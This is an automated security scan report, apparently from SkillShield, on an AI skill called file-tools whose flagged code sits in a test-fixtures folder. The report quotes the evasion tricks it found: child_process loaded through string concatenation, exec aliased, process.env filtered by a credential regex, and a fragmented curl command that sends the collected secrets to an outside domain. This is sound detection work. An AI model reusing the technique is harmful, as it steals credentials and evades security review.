Trust Assessment
file-tools received a trust score of 20/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 5 findings: 4 critical, 1 high, 0 medium, and 0 low severity. Key findings include Unsafe environment variable passthrough, Credential harvesting, Obfuscated Command Injection via child_process.exec.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 10/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (5)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Credential harvesting: Bulk environment variable dump. Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/c-goro/skillguard/test-fixtures/evasive-05-alias-chain/tools.js:14 |
| CRITICAL | Obfuscated Command Injection via child_process.exec: The skill dynamically loads the `child_process` module using string concatenation (`['child', 'process'].join('_')`) to evade static analysis. It then aliases `child_process.exec` to `doTask` and uses it to execute arbitrary commands constructed from string parts (`['cur', 'l ', '-s ', 'htt', 'ps://', 'dat', 'a.fi', 'le-too', 'ls.io']`). This allows for arbitrary command execution on the host system, indicating a severe command injection vulnerability. Remove all code that dynamically loads or executes `child_process` functions. Implement strict sandboxing and allow-listing for external process execution to prevent arbitrary command execution. | LLM | tools.js:19 |
| CRITICAL | Environment Variable Credential Harvesting: The skill iterates through all environment variables (`process.env`) and filters them using a regular expression (`/key\|secret\|token\|pass\|cred\|auth/i`) to identify and collect sensitive credentials such as API keys, secrets, tokens, passwords, and authentication details. This is a direct attempt to harvest credentials from the host environment. Remove all code that accesses or filters `process.env` for sensitive information. Skills should not have direct access to host environment variables, especially for harvesting purposes. | LLM | tools.js:14 |
| CRITICAL | Exfiltration of Harvested Credentials: The skill constructs a `curl` command using dynamically assembled parts (`['cur', 'l ', '-s ', 'htt', 'ps://', 'dat', 'a.fi', 'le-too', 'ls.io']`) and then uses `child_process.exec` (aliased as `doTask`) to send harvested sensitive environment variables (keys and values) to an external domain (`https://data.file-tools.io`). This constitutes a direct and deliberate data exfiltration attempt. Remove all code responsible for constructing and executing external network requests to send sensitive data. Implement network egress filtering and prevent skills from making unauthorized external connections. | LLM | tools.js:18 |
| HIGH | Unsafe environment variable passthrough: Bulk environment variable harvesting. Minimize environment variable exposure. Only pass required, non-sensitive variables to MCP servers. Use dedicated secret management instead of environment passthrough. | Manifest | skills/c-goro/skillguard/test-fixtures/evasive-05-alias-chain/tools.js:14 |